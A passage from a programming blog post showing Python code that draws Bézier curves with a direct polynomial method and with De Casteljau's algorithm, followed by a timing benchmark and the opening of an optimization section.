<span class="k">return</span> <span class="n">w</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="n">t2</span>
<span class="c1"># Calculates the cubic Bézier polynomial for </span>
<span class="c1"># the n+1=4 coordinates.</span>
<span class="k">def</span> <span class="nf">cubic_bezier_sum</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
<span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span> <span class="o">*</span> <span class="n">mt</span>
<span class="k">return</span> <span class="n">w</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">w</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">w</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="o">*</span><span class="n">t3</span>
<span class="k">def</span> <span class="nf">draw_quadratic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">quadratic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">quadratic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="c1"># self.plot_pixel(math.floor(x), math.floor(y))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span> <span class="c1"># 1000 iterations. If you want the curve to be really</span>
<span class="c1"># fine grained, consider "t += 0.0001" for ten thousand iterations.</span>
<span class="k">def</span> <span class="nf">draw_cubic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">cubic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p4</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">cubic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p4</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">x</span><span class="p">),</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">y</span><span class="p">))</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">master</span> <span class="o">=</span> <span class="n">tkinter</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">Bezier</span><span class="p">(</span><span class="n">master</span><span class="p">,</span> <span class="n">width</span><span class="o">=</span><span class="mi">1000</span><span class="p">,</span> <span class="n">height</span><span class="o">=</span><span class="mi">1000</span><span class="p">)</span>
<span class="n">w</span><span class="o">.</span><span class="n">pack</span><span class="p">()</span>
<span class="c1"># Finally draw some Bézier curves :)</span>
<span class="c1">#w.draw_quadratic_bez((70, 250), (62, 59), (250, 61))</span>
<span class="c1">#w.draw_quadratic_bez((170,77), (162, 159), (210, 161))</span>
<span class="n">w</span><span class="o">.</span><span class="n">draw_quadratic_bez</span><span class="p">((</span><span class="mi">0</span><span class="p">,</span> <span class="mi">100</span><span class="p">),</span> <span class="p">(</span><span class="mi">162</span><span class="p">,</span> <span class="mi">89</span><span class="p">),</span> <span class="p">(</span><span class="mi">250</span><span class="p">,</span> <span class="mi">61</span><span class="p">))</span>
<span class="c1">#w.draw_cubic_bez((120, 160), (35, 200), (153, 268), (165, 70))</span>
<span class="n">tkinter</span><span class="o">.</span><span class="n">mainloop</span><span class="p">()</span>
</code></pre></div>
<p>And now De Casteljau’s algorithm. It is not limited to quadratic and
cubic Bézier curves; on the contrary, you are free to plot curves of any
degree n. Just give it a try!</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">tkinter</span>
<span class="k">class</span> <span class="nc">InvalidInputError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">pass</span>
<span class="k">class</span> <span class="nc">Casteljau</span><span class="p">(</span><span class="n">tkinter</span><span class="o">.</span><span class="n">Canvas</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Implementation of de Casteljau's algorithm for drawing Bézier curves.</span>
<span class="sd"> Implemented following the description at http://pomax.github.io/bezierinfo/#control.</span>
<span class="sd"> Author: Nikolai Tschacher</span>
<span class="sd"> Date: 07.10.2013</span>
<span class="sd"> '''</span>
<span class="c1"># Because Canvas doesn't support plotting single pixels,</span>
<span class="c1"># we work around it by drawing a line of length 1 in the</span>
<span class="c1"># positive x direction.</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">create_line</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y0</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">draw_curve</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span>
<span class="c1"># Check that the input parameters are valid. We don't check whether</span>
<span class="c1"># the elements in the tuples are of type int or float.</span>
<span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">points</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span><span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="nb">tuple</span><span class="p">)</span> <span class="ow">or</span> <span class="ow">not</span> <span class="nb">len</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">):</span>
<span class="k">raise</span> <span class="n">InvalidInputError</span><span class="p">(</span><span class="s1">'points is not a list of points(tuples)'</span><span class="p">)</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">newpoints</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span>
<span class="n">newpoints</span><span class="o">.</span><span class="n">append</span><span class="p">((</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_curve</span><span class="p">(</span><span class="n">newpoints</span><span class="p">,</span> <span class="n">t</span><span class="p">)</span>
<span class="c1"># De Casteljau's algorithm with the recursion eliminated, but the same</span>
<span class="c1"># geometrical approach. Idea: avoid the expensive stack frame creation</span>
<span class="c1"># that recursion comes with. Works only for quadratic Bézier curves.</span>
<span class="k">def</span> <span class="nf">draw_point2</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span>
<span class="c1"># Linear interpolation between P0 and P1, then between P1 and P2</span>
<span class="n">q0_x</span><span class="p">,</span> <span class="n">q0_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="n">q1_x</span><span class="p">,</span> <span class="n">q1_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="n">b_x</span><span class="p">,</span> <span class="n">b_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span><span class="o">*</span><span class="n">q0_x</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">q1_x</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span><span class="o">*</span><span class="n">q0_y</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">q1_y</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">b_x</span><span class="p">,</span> <span class="n">b_y</span><span class="p">)</span>
<span class="c1"># Usage function for the algorithm.</span>
<span class="k">def</span> <span class="nf">draw</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><=</span> <span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_curve</span><span class="p">(</span><span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">master</span> <span class="o">=</span> <span class="n">tkinter</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">Casteljau</span><span class="p">(</span><span class="n">master</span><span class="p">,</span> <span class="n">width</span><span class="o">=</span><span class="mi">1000</span><span class="p">,</span> <span class="n">height</span><span class="o">=</span><span class="mi">1000</span><span class="p">)</span>
<span class="n">w</span><span class="o">.</span><span class="n">pack</span><span class="p">()</span>
<span class="c1"># Finally draw some Bézier curves :)</span>
<span class="n">w</span><span class="o">.</span><span class="n">draw</span><span class="p">([(</span><span class="mi">70</span><span class="p">,</span> <span class="mi">250</span><span class="p">),</span> <span class="p">(</span><span class="mi">462</span><span class="p">,</span> <span class="mi">159</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)])</span>
<span class="c1">#w.draw([(133, 267), (121, 28), (198, 270), (210, 29)])</span>
<span class="n">tkinter</span><span class="o">.</span><span class="n">mainloop</span><span class="p">()</span>
</code></pre></div>
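<p>The recursion-free variant above handles only quadratic curves. As a rough sketch (not the code from the repo), the same repeated linear interpolation can be written as a plain loop that works for any degree. The helper names <code>de_casteljau_point</code> and <code>sample_curve</code> are made up for this illustration, and the drawing part is left out on purpose. Deriving t from an integer counter, instead of adding 0.001 over and over, also avoids accumulating floating-point rounding errors:</p>

```python
def de_casteljau_point(points, t):
    """Evaluate a Bézier curve of any degree at parameter t (0 <= t <= 1)."""
    pts = list(points)
    # Repeatedly interpolate between neighbouring points until one remains.
    while len(pts) > 1:
        pts = [((1 - t) * x0 + t * x1, (1 - t) * y0 + t * y1)
               for (x0, y0), (x1, y1) in zip(pts, pts[1:])]
    return pts[0]


def sample_curve(points, steps=1000):
    """Return steps + 1 points on the curve.

    t is computed as i / steps, so t = 0 and t = 1 are both hit exactly.
    """
    return [de_casteljau_point(points, i / steps) for i in range(steps + 1)]


if __name__ == '__main__':
    # Same control points as in the quadratic example above.
    curve = sample_curve([(70, 250), (462, 159), (0, 0)], steps=4)
    for point in curve:
        print(point)
```

<p>Each returned point could then be handed to <code>plot_pixel</code>. Whether this loop is actually faster than the recursive version would have to be measured.</p>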
<p>And finally the performance comparison between the two algorithms. The
direct approach wins over De Casteljau’s algorithm (I guess because
recursion is such a slowpoke), but on the other hand, De Casteljau's
method is numerically stable. In the run shown below, the direct approach
is roughly four times as fast. Treat this as a rough estimate only: Python
isn't really the language you would use for such stuff, and my
implementation is certainly not good enough to claim that every De
Casteljau implementation is slower by exactly that factor. Note that
the initial type checks in <code>draw_curve()</code> in class <code>Casteljau</code> were
disabled while testing the speed to avoid distorting the results. Furthermore, I've
shamelessly stolen the timing method from <a href="http://preshing.com/20110924/timing-your-code-using-pythons-with-statement/">this
site</a>,
using the following little class to time code within <em>with</em> statements:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">time</span>
<span class="k">class</span> <span class="nc">Timer</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="o">=</span><span class="s1">''</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">verbose</span> <span class="o">=</span> <span class="n">verbose</span>
<span class="bp">self</span><span class="o">.</span><span class="n">msg</span> <span class="o">=</span> <span class="n">msg</span>
<span class="k">def</span> <span class="fm">__enter__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">start</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">return</span> <span class="bp">self</span>
<span class="k">def</span> <span class="fm">__exit__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="o">*</span><span class="n">args</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">end</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">secs</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">end</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">start</span>
<span class="bp">self</span><span class="o">.</span><span class="n">msecs</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">secs</span> <span class="o">*</span> <span class="mi">1000</span> <span class="c1"># millisecs</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verbose</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[!] </span><span class="si">%s</span><span class="s1"> - elapsed time: </span><span class="si">%f</span><span class="s1"> ms'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">msg</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">msecs</span><span class="p">))</span>
</code></pre></div>
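<p>As a side note, here is a minimal variation of the same idea that uses <code>time.perf_counter()</code> from the standard library, a clock intended for measuring short durations. The class name <code>PerfTimer</code> is made up for this sketch; it is not what the measurements in this post were taken with:</p>

```python
import time


class PerfTimer:
    """Context manager that measures elapsed time in milliseconds."""

    def __init__(self, msg='', verbose=True):
        self.msg = msg
        self.verbose = verbose

    def __enter__(self):
        self.start = time.perf_counter()
        return self

    def __exit__(self, *args):
        # perf_counter() returns seconds as a float; convert to milliseconds.
        self.msecs = (time.perf_counter() - self.start) * 1000
        if self.verbose:
            print('[!] %s - elapsed time: %f ms' % (self.msg, self.msecs))


if __name__ == '__main__':
    with PerfTimer('Summing one million integers') as timer:
        total = sum(range(1_000_000))
    print(total)
```

<p>The measured value stays available as <code>timer.msecs</code> after the <em>with</em> block, which is handy when you want to compare two runs programmatically.</p>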
<p>Finally, the source code for the performance tests. Please keep in mind
that it might be hard to reproduce exactly the same results as below,
since the code in the GitHub repo evolves over time:</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">timer</span> <span class="kn">import</span> <span class="n">Timer</span>
<span class="kn">from</span> <span class="nn">bezier</span> <span class="kn">import</span> <span class="n">Bezier</span> <span class="c1"># Simple bezier drawing algorithm directly derived from calculus.</span>
<span class="kn">from</span> <span class="nn">casteljau</span> <span class="kn">import</span> <span class="n">Casteljau</span> <span class="c1"># Drawing curves using de Casteljau's algorithm.</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="c1"># Override the Bezier and Casteljau classes to disable the GUI functions. We just want to</span>
<span class="c1"># measure the algorithms' performance, not the graphical toolkit overhead...</span>
<span class="c1"># Pre calculate random points for quadratic and cubic Bézier simulation for</span>
<span class="c1"># performance tests.</span>
<span class="n">NUMBER_OF_CURVES</span> <span class="o">=</span> <span class="mi">500</span>
<span class="n">R</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span>
<span class="n">pp</span> <span class="o">=</span> <span class="p">[[(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">))]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">NUMBER_OF_CURVES</span><span class="p">)]</span>
<span class="n">pp4</span> <span class="o">=</span> <span class="p">[[(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">))]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">NUMBER_OF_CURVES</span><span class="p">)]</span>
<span class="k">class</span> <span class="nc">BezierPerf</span><span class="p">(</span><span class="n">Bezier</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test1</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test2</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="k">pass</span> <span class="c1"># Nothin here oO</span>
<span class="k">def</span> <span class="nf">test1</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing quadratic bezier with direct approach'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_quadratic_bez</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">test2</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing cubic curves with direct approach'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp4</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_cubic_bez</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
<span class="k">class</span> <span class="nc">CasteljauPerf</span><span class="p">(</span><span class="n">Casteljau</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test1</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test2</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="k">pass</span> <span class="c1"># No drawing please.</span>
<span class="k">def</span> <span class="nf">test1</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing quadratic bezier curves with De Casteljau'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw</span><span class="p">(</span><span class="n">points</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">test2</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing cubic bezier curves with De Casteljau'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp4</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw</span><span class="p">(</span><span class="n">points</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">test2</span> <span class="o">=</span> <span class="n">CasteljauPerf</span><span class="p">()</span>
<span class="n">test</span> <span class="o">=</span> <span class="n">BezierPerf</span><span class="p">()</span>
</code></pre></div>
<p>The above timing yields this output: </p>
<div class="highlight"><pre><span></span><code>[nikolai@niko-arch python_tests]$ python performance_tests.py
[!] Testing quadratic bezier curves with De Casteljau - elapsed time: 5814.155579 ms
[!] Testing cubic bezier curves with De Casteljau - elapsed time: 9396.822453 ms
[!] Testing quadratic bezier with direct approach - elapsed time: 1528.661489 ms
[!] Testing cubic curves with direct approach - elapsed time: 2135.466337 ms
</code></pre></div>
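<p>To put a number on the difference, the speed-up factors can be computed directly from the four timings printed above. This is just arithmetic on that single run; the dictionary layout and the function name <code>speedup</code> are chosen for illustration only:</p>

```python
# Elapsed times in milliseconds, copied from the output above.
timings = {
    'quadratic': {'casteljau': 5814.155579, 'direct': 1528.661489},
    'cubic': {'casteljau': 9396.822453, 'direct': 2135.466337},
}


def speedup(entry):
    """How many times faster the direct approach was in this run."""
    return entry['casteljau'] / entry['direct']


if __name__ == '__main__':
    for degree, entry in timings.items():
        print('%s: direct approach is %.2f times faster' % (degree, speedup(entry)))
```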
<h3>Optimizing</h3>
<p>When it comes to optimization, one can go almost infinitely deep and
far. A huge amount of scientific research and work has been invested in it,
because saving CPU power means saving money. For instance, in compiler
development, the optimization part constitutes the most complex and
work-intensive part (if I remember my Coursera lessons correctly). I
will instead only scratch the surface and won't dive into the depths
of optimizing (well, these metaphors combined are utterly strange ;)).<br>
I will tune the direct algorithm, because it is simply faster than De
Casteljau's recursive approach.</p>
<p>Some concepts (and common sense):</p>
<ul>
<li><em>Avoid double calculations.</em> Have a look at the code above (or <a href="https://github.com/NikolaiT/CunningCaptcha/blob/master/python_tests/bezier.py">on
GitHub</a>).
The functions <code>quadratic_bezier_sum</code> and <code>cubic_bezier_sum</code> are
called twice per point, once for the x and once for the y coordinate. This means that the
coefficients of the equation are also calculated twice, although we
could compute them once and reuse them for the other
coordinate (in our case just the y coordinate). Eliminate this
problem by incorporating the function's logic directly into the
caller's context, namely into the methods
<code>draw_(quadratic|cubic)_bez</code>. This brings us directly to the
second point...</li>
<li>
